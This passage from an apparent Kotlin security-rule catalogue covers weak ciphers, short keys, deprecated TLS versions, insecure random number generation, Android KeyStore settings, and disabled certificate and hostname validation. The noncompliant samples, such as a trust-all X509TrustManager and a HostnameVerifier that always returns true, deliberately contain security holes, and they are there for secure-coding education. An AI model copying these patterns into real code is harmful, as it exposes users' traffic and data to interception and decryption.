For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Java Cryptographic Extension

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

import javax.crypto.NoSuchPaddingException
import java.security.NoSuchAlgorithmException
import javax.crypto.Cipher

fun main(args: Array<String>) {
    try {
        val des = Cipher.getInstance("DES") // Noncompliant
    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: NoSuchPaddingException) {
        // ...
    }
}

Compliant solution

import javax.crypto.NoSuchPaddingException
import java.security.NoSuchAlgorithmException
import javax.crypto.Cipher

fun main(args: Array<String>) {
    try {
        val aes = Cipher.getInstance("AES/GCM/NoPadding")
    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: NoSuchPaddingException) {
        // ...
    }
}

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.
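The JCE reports each cipher's block size directly, which makes the difference easy to check; this small comparison is a sketch, not part of the rule itself.

```kotlin
import javax.crypto.Cipher

fun main() {
    // getBlockSize() returns bytes: DES works on 64-bit blocks, AES on 128-bit blocks.
    val des = Cipher.getInstance("DES")
    val aes = Cipher.getInstance("AES/GCM/NoPadding")
    println("DES block size: ${des.blockSize * 8} bits") // below the recommended 128-bit minimum
    println("AES block size: ${aes.blockSize * 8} bits")
}
```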

Resources

Standards

kotlin:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB (Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

For RSA, the weakest configurations either use no padding at all or use the PKCS#1 v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Java Cryptographic Extension

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

import javax.crypto.Cipher
import javax.crypto.NoSuchPaddingException
import java.security.NoSuchAlgorithmException

fun main(args: Array<String>) {
    try {
        val aes = Cipher.getInstance("AES/CBC/PKCS5Padding") // Noncompliant
    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: NoSuchPaddingException) {
        // ...
    }
}

Example with an asymmetric cipher, RSA:

import javax.crypto.Cipher
import javax.crypto.NoSuchPaddingException
import java.security.NoSuchAlgorithmException

fun main(args: Array<String>) {
    try {
        val rsa = Cipher.getInstance("RSA/None/NoPadding") // Noncompliant
    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: NoSuchPaddingException) {
        // ...
    }
}

Compliant solution

For the AES symmetric cipher, use the GCM mode:

import javax.crypto.Cipher
import javax.crypto.NoSuchPaddingException
import java.security.NoSuchAlgorithmException

fun main(args: Array<String>) {
    try {
        val aes = Cipher.getInstance("AES/GCM/NoPadding")
    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: NoSuchPaddingException) {
        // ...
    }
}

For the RSA asymmetric cipher, use the Optimal Asymmetric Encryption Padding (OAEP):

import javax.crypto.Cipher
import javax.crypto.NoSuchPaddingException
import java.security.NoSuchAlgorithmException

fun main(args: Array<String>) {
    try {
        val rsa = Cipher.getInstance("RSA/ECB/OAEPWITHSHA-256ANDMGF1PADDING")
    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: NoSuchPaddingException) {
        // ...
    }
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.
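This authenticity guarantee can be observed directly: flipping a single bit of a GCM ciphertext makes decryption fail with an AEADBadTagException instead of silently returning corrupted plaintext. The helper below is an illustrative sketch.

```kotlin
import java.security.SecureRandom
import javax.crypto.AEADBadTagException
import javax.crypto.Cipher
import javax.crypto.KeyGenerator
import javax.crypto.spec.GCMParameterSpec

// Sketch: returns true when GCM rejects a ciphertext that was modified in transit.
fun gcmDetectsTampering(): Boolean {
    val key = KeyGenerator.getInstance("AES").apply { init(128) }.generateKey()
    val iv = ByteArray(12).also { SecureRandom().nextBytes(it) }

    val enc = Cipher.getInstance("AES/GCM/NoPadding")
    enc.init(Cipher.ENCRYPT_MODE, key, GCMParameterSpec(128, iv))
    val ciphertext = enc.doFinal("transfer 100".toByteArray())

    ciphertext[0] = (ciphertext[0].toInt() xor 1).toByte() // attacker flips one bit

    val dec = Cipher.getInstance("AES/GCM/NoPadding")
    dec.init(Cipher.DECRYPT_MODE, key, GCMParameterSpec(128, iv))
    return try {
        dec.doFinal(ciphertext)
        false // tampering went unnoticed
    } catch (e: AEADBadTagException) {
        true // the authentication tag no longer matches
    }
}
```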

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Carter-Wegman + CTR mode
  • EAX: Encrypt-then-Authenticate-then-Translate
  • IAPM: Integrity Aware Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it is considered more straightforward to use AES-GCM directly instead.

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.
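That added randomness is observable: with OAEP, encrypting the same message twice under the same public key yields two different ciphertexts, while both still decrypt to the original. The helper functions below are an illustrative sketch.

```kotlin
import java.security.KeyPair
import java.security.KeyPairGenerator
import javax.crypto.Cipher

const val OAEP = "RSA/ECB/OAEPWITHSHA-256ANDMGF1PADDING"

fun oaepEncrypt(keys: KeyPair, msg: ByteArray): ByteArray =
    Cipher.getInstance(OAEP).apply { init(Cipher.ENCRYPT_MODE, keys.public) }.doFinal(msg)

fun oaepDecrypt(keys: KeyPair, ct: ByteArray): ByteArray =
    Cipher.getInstance(OAEP).apply { init(Cipher.DECRYPT_MODE, keys.private) }.doFinal(ct)

fun main() {
    val keys = KeyPairGenerator.getInstance("RSA").apply { initialize(2048) }.generateKeyPair()
    val msg = "same message".toByteArray()
    // OAEP seeds each encryption with fresh randomness, so the ciphertexts differ:
    println(oaepEncrypt(keys, msg).contentEquals(oaepEncrypt(keys, msg)))
    // ...but every ciphertext still decrypts back to the original message:
    println(oaepDecrypt(keys, oaepEncrypt(keys, msg)).contentEquals(msg))
}
```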

Resources

Articles & blog posts

Standards

kotlin:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It encourages mistakenly using the same address in every environment (dev, sys, qa, prod).

Last but not least, it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks are always possible, but when the IP address is hardcoded, solving the issue takes more time, which increases the attack's impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • It can give an attacker information about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code; instead, make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentiality is not required, a domain name can be used, since it allows the destination to be changed quickly without rebuilding the software.

Sensitive Code Example

val ip = "192.168.12.42"
val socket = Socket(ip, 6667)

Compliant Solution

val ip = System.getenv("myapplication.ip")
val socket = Socket(ip, 6667)

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849
  • Addresses from ::ffff:0:127.0.0.1 to ::ffff:0:127.255.255.255 and from ::ffff:127.0.0.1 to ::ffff:127.255.255.255, which are local IPv4-mapped IPv6 addresses

See

kotlin:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it over a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Java Cryptographic Extension

Code examples

Noncompliant code example

import javax.net.ssl.SSLContext
import java.security.NoSuchAlgorithmException

fun main(args: Array<String>) {
    try {
        SSLContext.getInstance("TLSv1.1") // Noncompliant
    } catch (e: NoSuchAlgorithmException) {
        // ...
    }
}

Compliant solution

import javax.net.ssl.SSLContext
import java.security.NoSuchAlgorithmException

fun main(args: Array<String>) {
    try {
        SSLContext.getInstance("TLSv1.2")
    } catch (e: NoSuchAlgorithmException) {
        // ...
    }
}

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS v1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback depends on whether the framework used is outdated: its TLS v1.2 settings may enable older cipher suites that are deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.
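On the JVM, this choice is typically enforced per connection. Assuming a JDK with TLS 1.3 support, an SSLEngine (or SSLSocket) can be restricted to the modern protocol versions only; the sketch below shows the engine-level setting.

```kotlin
import javax.net.ssl.SSLContext
import javax.net.ssl.SSLEngine

// Sketch: build an engine that will only negotiate TLS 1.2 or TLS 1.3.
fun modernTlsEngine(): SSLEngine {
    val context = SSLContext.getInstance("TLS")
    context.init(null, null, null) // default key managers, trust managers, and RNG
    return context.createSSLEngine().apply {
        enabledProtocols = arrayOf("TLSv1.2", "TLSv1.3")
    }
}

fun main() {
    println(modernTlsEngine().enabledProtocols.toList())
}
```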

Resources

Articles & blog posts

Standards

kotlin:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) like PBKDF2 (Password-Based Key Derivation Function 2)
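To illustrate the KDF case (a sketch in Java; the iteration count, salt size, and passphrase are illustrative values, not prescriptions), PBKDF2 stretches a passphrase into a fixed-size AES key:

```java
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;
import java.security.SecureRandom;

public class DeriveKey {
    public static SecretKeySpec aesKeyFromPassphrase(char[] passphrase, byte[] salt) throws Exception {
        // PBKDF2 with HMAC-SHA256: many iterations, 256-bit output key
        PBEKeySpec spec = new PBEKeySpec(passphrase, salt, 210_000, 256);
        SecretKeyFactory factory = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256");
        byte[] keyBytes = factory.generateSecret(spec).getEncoded();
        return new SecretKeySpec(keyBytes, "AES");
    }

    public static void main(String[] args) throws Exception {
        byte[] salt = new byte[16];
        new SecureRandom().nextBytes(salt); // per-user random salt
        SecretKeySpec key = aesKeyFromPassphrase("correct horse battery staple".toCharArray(), salt);
        System.out.println(key.getEncoded().length * 8); // prints 256
    }
}
```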

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Java Cryptographic Extension

Code examples

The following code examples either explicitly or implicitly generate keys. Note that there are differences in the size of the keys depending on the algorithm.

Due to the mathematical properties of the algorithms, the security requirements for the key size vary depending on the algorithm.
For example, a 256-bit ECC key provides about the same level of security as a 3072-bit RSA key and a 128-bit symmetric key.

Noncompliant code example

Here is an example of a private key generation with RSA:

import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;

fun main(args: Array<String>) {
    try {
        val keyPairGenerator = KeyPairGenerator.getInstance("RSA");
        keyPairGenerator.initialize(1024); // Noncompliant

    } catch (e: NoSuchAlgorithmException) {
        // ...
    }
}

Here is an example of a private key generation with AES:

import javax.crypto.KeyGenerator;
import java.security.NoSuchAlgorithmException;

fun main(args: Array<String>) {
    try {
        val keyGenerator = KeyGenerator.getInstance("AES");
        keyGenerator.init(64); // Noncompliant

    } catch (e: NoSuchAlgorithmException) {
        // ...
    }
}

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;
import java.security.InvalidAlgorithmParameterException;
import java.security.spec.ECGenParameterSpec;

fun main(args: Array<String>) {
    try {
        val keyPairGenerator  = KeyPairGenerator.getInstance("EC");
        val ellipticCurveName = ECGenParameterSpec("secp112r1"); // Noncompliant
        keyPairGenerator.initialize(ellipticCurveName);

    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: InvalidAlgorithmParameterException) {
        // ...
    }
}

Compliant solution

import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;

fun main(args: Array<String>) {
    try {
        val keyPairGenerator = KeyPairGenerator.getInstance("RSA");
        keyPairGenerator.initialize(2048);

    } catch (e: NoSuchAlgorithmException) {
        // ...
    }
}
import javax.crypto.KeyGenerator;
import java.security.NoSuchAlgorithmException;

fun main(args: Array<String>) {
    try {
        val keyGenerator = KeyGenerator.getInstance("AES");
        keyGenerator.init(128);

    } catch (e: NoSuchAlgorithmException) {
        // ...
    }
}
import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;
import java.security.InvalidAlgorithmParameterException;
import java.security.spec.ECGenParameterSpec;

fun main(args: Array<String>) {
    try {
        val keyPairGenerator  = KeyPairGenerator.getInstance("EC");
        val ellipticCurveName = ECGenParameterSpec("secp256r1");
        keyPairGenerator.initialize(ellipticCurveName);

    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: InvalidAlgorithmParameterException) {
        // ...
    }
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of keys generated with elliptic curve algorithms is indicated directly in their names. For example, secp256k1 generates a 256-bit private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterparts.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.

Learn more here.

Resources

Articles & blog posts

Standards

kotlin:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive. For example, it has led in the past to the following vulnerabilities:

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

Ask Yourself Whether

  • the code using the generated value requires it to be unpredictable. It is the case for all encryption mechanisms or when a secret value, such as a password, is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Only use random number generators which are recommended by OWASP or any other trusted organization.
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

val random = Random() // Noncompliant: Random() is not a secure random number generator
val bytes = ByteArray(20)
random.nextBytes(bytes)

Compliant Solution

val random = SecureRandom() // Compliant
val bytes = ByteArray(20)
random.nextBytes(bytes)

See

kotlin:S6288

Android KeyStore is a secure container for storing key material. In particular, it prevents key material extraction: even when the application process is compromised, the attacker cannot extract keys, although they may still be able to use them. Android offers a security feature, user authentication, that can restrict the usage of keys to authenticated users only; the lock screen then has to be unlocked with defined credentials (pattern/PIN/password, biometric).

Ask Yourself Whether

  • The application requires prohibiting the use of keys in case of compromise of the application process.
  • The key material is used in the context of a highly sensitive application like an e-banking mobile app.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to enable user authentication (by setting setUserAuthenticationRequired to true during key generation) to use keys for a limited duration of time (by setting appropriate values to setUserAuthenticationValidityDurationSeconds), after which the user must re-authenticate.

Sensitive Code Example

Any user can use the key:

val keyGenerator: KeyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, "AndroidKeyStore")

var builder: KeyGenParameterSpec = KeyGenParameterSpec.Builder("test_secret_key", KeyProperties.PURPOSE_ENCRYPT or KeyProperties.PURPOSE_DECRYPT) // Noncompliant
   .setBlockModes(KeyProperties.BLOCK_MODE_GCM)
   .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
   .build()

keyGenerator.init(builder)

Compliant Solution

The use of the key is limited to authenticated users (for a duration set to 60 seconds):

val keyGenerator: KeyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, "AndroidKeyStore")

var builder: KeyGenParameterSpec = KeyGenParameterSpec.Builder("test_secret_key", KeyProperties.PURPOSE_ENCRYPT or KeyProperties.PURPOSE_DECRYPT)
   .setBlockModes(KeyProperties.BLOCK_MODE_GCM)
   .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
   .setUserAuthenticationRequired(true) // Compliant
   .setUserAuthenticationParameters(60, KeyProperties.AUTH_DEVICE_CREDENTIAL)
   .build()

keyGenerator.init(builder)

See

kotlin:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in Java Cryptographic Extension

Code examples

The following code contains examples of disabled certificate validation.

The certificate validation gets disabled by overriding X509TrustManager with an empty implementation. It is highly recommended to use the original implementation.

Noncompliant code example

val trustAllCerts = arrayOf<TrustManager>(object : X509TrustManager {
  @Throws(CertificateException::class)
  override fun checkClientTrusted(chain: Array<java.security.cert.X509Certificate>, authType: String) {
  } // Noncompliant

  @Throws(CertificateException::class)
  override fun checkServerTrusted(chain: Array<java.security.cert.X509Certificate>, authType: String) {
  } // Noncompliant

  override fun getAcceptedIssuers(): Array<java.security.cert.X509Certificate> {
   return arrayOf()
  }
})

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.

Here is a sample command to import a certificate to the Java trust store:

keytool -import -alias myserver -file myserver.crt -keystore cacerts
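The same idea can be applied in code: instead of overriding X509TrustManager, initialize an SSLContext from a trust store that contains the extra certificate, so validation stays enabled. This is a sketch in Java; the store file name and password are placeholders:

```java
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManagerFactory;
import java.io.FileInputStream;
import java.security.KeyStore;

public class CustomTrust {
    // Build an SSLContext that validates servers against the given trust store.
    // Passing null falls back to the JVM's default cacerts.
    public static SSLContext contextFor(KeyStore trustStore) throws Exception {
        TrustManagerFactory tmf =
            TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
        tmf.init(trustStore);
        SSLContext context = SSLContext.getInstance("TLSv1.2");
        context.init(null, tmf.getTrustManagers(), null);
        return context;
    }

    public static void main(String[] args) throws Exception {
        // Hypothetical trust store file holding the self-signed certificate
        KeyStore store = KeyStore.getInstance(KeyStore.getDefaultType());
        try (FileInputStream in = new FileInputStream("truststore.jks")) {
            store.load(in, "changeit".toCharArray());
        }
        SSLContext context = contextFor(store);
        // use context.getSocketFactory() for HTTPS connections
    }
}
```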

Resources

Standards

kotlin:S5527

This vulnerability allows attackers to impersonate a trusted host.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. In this process, the role of hostname validation, combined with certificate validation, is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When hostname validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

To do so, an attacker only needs a valid certificate for a hostname under their control: since the application never checks that the certificate matches the host it intended to contact, such as example.com, the application code would still accept it.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable hostname validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate hostnames, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

How to fix it in OkHttp

Code examples

The following code contains examples of disabled hostname validation.

The hostname validation gets disabled by overriding javax.net.ssl.HostnameVerifier.verify() with an empty implementation. It is highly recommended to use the original implementation.

Noncompliant code example

import javax.net.ssl.HttpsURLConnection
import javax.net.ssl.SSLSession
import javax.net.ssl.HostnameVerifier
import okhttp3.OkHttpClient
import okhttp3.Request
import okhttp3.Response

fun request() {
    val builder = OkHttpClient.Builder()
    builder.hostnameVerifier(object : HostnameVerifier {
      override fun verify(hostname: String?, session: SSLSession?): Boolean { // Noncompliant
        return true
      }
    })

    val client = builder.build()

    val request = Request.Builder()
            .url("https://example.com")
            .build()

    val response = client.newCall(request).execute()
}

Compliant solution

import javax.net.ssl.HttpsURLConnection
import javax.net.ssl.SSLSession
import javax.net.ssl.HostnameVerifier
import okhttp3.OkHttpClient
import okhttp3.Request
import okhttp3.Response

fun request() {
    val builder = OkHttpClient.Builder()

    val client = builder.build()

    val request = Request.Builder()
            .url("https://example.com")
            .build()

    val response = client.newCall(request).execute()
}

How does this work?

To fix the vulnerability of disabled hostname validation, it is strongly recommended to first re-enable the default validation and fix the root cause: the validity of the certificate.

Use valid certificates

If a hostname validation failure prevents connecting to the target server, keep in mind that one system’s code should not work around another system’s problems, as this creates unnecessary dependencies and can lead to reliability issues.

Therefore, the first solution is to change the remote host’s certificate to match its identity. If the remote host is not under your control, consider replicating its service to a server whose certificate you can change yourself.

In case the contacted host is located on a development machine, and if there is no other choice, try following this solution:

  • Create a self-signed certificate for that machine.
  • Add this self-signed certificate to the system’s trust store.
  • If the hostname is not localhost, add the hostname in the /etc/hosts file.

Here is a sample command to import a certificate to the Java trust store:

keytool -import -alias myserver -file myserver.crt -keystore cacerts

Resources

Standards

kotlin:S6291

Storing data locally is a common task for mobile applications. Such data includes preferences or authentication tokens for external services, among other things. There are many convenient solutions that allow storing data persistently, for example SQLiteDatabase, SharedPreferences, and Realm. By default these systems store the data unencrypted, so an attacker with physical access to the device can easily read it out. Access to sensitive data can be harmful for the user of the application, for example when the device gets stolen.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

